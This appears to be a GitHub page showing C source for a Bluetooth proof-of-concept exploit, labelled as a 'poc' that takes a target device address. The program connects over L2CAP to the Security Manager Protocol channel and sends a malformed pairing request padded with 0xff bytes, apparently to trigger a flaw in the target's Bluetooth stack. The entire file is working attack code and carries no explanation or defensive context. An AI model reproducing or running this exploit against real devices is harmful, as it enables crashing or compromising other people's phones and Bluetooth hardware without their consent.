Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
141 lines (115 sloc) 3.75 KB
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>
// #include "avdt_defs.h"
#define BT_CID_SMP 0x0006
/* SMP command code */
#define SMP_OPCODE_PAIRING_REQ 0x01
#define SMP_OPCODE_PAIRING_RSP 0x02
#define SMP_OPCODE_CONFIRM 0x03
#define SMP_OPCODE_RAND 0x04
#define SMP_OPCODE_PAIRING_FAILED 0x05
#define SMP_OPCODE_ENCRYPT_INFO 0x06
#define SMP_OPCODE_MASTER_ID 0x07
#define SMP_OPCODE_IDENTITY_INFO 0x08
#define SMP_OPCODE_ID_ADDR 0x09
#define SMP_OPCODE_SIGN_INFO 0x0A
#define SMP_OPCODE_SEC_REQ 0x0B
#define SMP_OPCODE_PAIR_PUBLIC_KEY 0x0C
#define SMP_OPCODE_PAIR_DHKEY_CHECK 0x0D
#define SMP_OPCODE_PAIR_KEYPR_NOTIF 0x0E
#define SMP_OPCODE_MAX SMP_OPCODE_PAIR_KEYPR_NOTIF
#define SMP_OPCODE_MIN SMP_OPCODE_PAIRING_REQ
#define SMP_OPCODE_PAIR_COMMITM 0x0F
#define UINT32_TO_STREAM(p, u32) \
{ \
*(p)++ = (uint8_t)(u32); \
*(p)++ = (uint8_t)((u32) >> 8); \
*(p)++ = (uint8_t)((u32) >> 16); \
*(p)++ = (uint8_t)((u32) >> 24); \
}
#define UINT24_TO_STREAM(p, u24) \
{ \
*(p)++ = (uint8_t)(u24); \
*(p)++ = (uint8_t)((u24) >> 8); \
*(p)++ = (uint8_t)((u24) >> 16); \
}
#define UINT16_TO_STREAM(p, u16) \
{ \
*(p)++ = (uint8_t)(u16); \
*(p)++ = (uint8_t)((u16) >> 8); \
}
#define UINT8_TO_STREAM(p, u8) \
{ *(p)++ = (uint8_t)(u8); }
void send_trigger_req(int sock_fd)
{
uint8_t buffer[100];
memset(buffer, 0, 100);
uint8_t *p = buffer;
uint8_t cmd = SMP_OPCODE_PAIRING_REQ;
*p++ = cmd;
memcpy(p, "\xff\xff\xff\xff\xff\xff", 6);
p += 6;
send(sock_fd, buffer, p - buffer, 0);
}
int main(int argc ,char* argv[]){
int sock_fd, ret;
int try_count = 1;
char dest[18];
struct sockaddr_l2 local_l2_addr;
struct sockaddr_l2 remote_l2_addr;
struct bt_security btsec;
if(argc < 2){
printf("usage : sudo ./poc TARGET_ADDR\n");
return -1;
}
strncpy(dest, argv[1], 18);
while( try_count-- > 0 )
{
sock_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
if(sock_fd == -1){
perror("[*] socket create failed : ");
return -1;
}
memset(&local_l2_addr, 0, sizeof(struct sockaddr_l2));
local_l2_addr.l2_family = AF_BLUETOOTH;
local_l2_addr.l2_cid = htobs(BT_CID_SMP);
local_l2_addr.l2_bdaddr_type = 0;
memcpy(&local_l2_addr.l2_bdaddr , BDADDR_ANY, sizeof(bdaddr_t));
ret = bind(sock_fd, (struct sockaddr*) &local_l2_addr, sizeof(struct sockaddr_l2));
if(ret == -1){
perror("[*] bind()");
goto out;
}
memset(&btsec, 0, sizeof(btsec));
btsec.level = BT_SECURITY_LOW;
if(setsockopt(sock_fd, SOL_BLUETOOTH, BT_SECURITY, &btsec, sizeof(btsec)) != 0){
perror("[*] setsockopt error");
goto out;
}
// l2cap_set_mtu(sock_fd, 1024, 1024);
memset(&remote_l2_addr, 0, sizeof(remote_l2_addr));
remote_l2_addr.l2_family = AF_BLUETOOTH;
remote_l2_addr.l2_bdaddr_type = 0;//BDADDR_LE_PUBLIC;
remote_l2_addr.l2_cid = htobs(BT_CID_SMP);
//remote_l2_addr.l2_psm = htobs(6);
str2ba(dest, &remote_l2_addr.l2_bdaddr);
printf("connect %s\n", dest);
if(connect(sock_fd, (struct sockaddr *) &remote_l2_addr,sizeof(remote_l2_addr)) < 0) {
perror("[*] can't connect");
goto out;
}
send_trigger_req(sock_fd);
//sleep(1);
}
out:
close(sock_fd);
return 0;
}
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.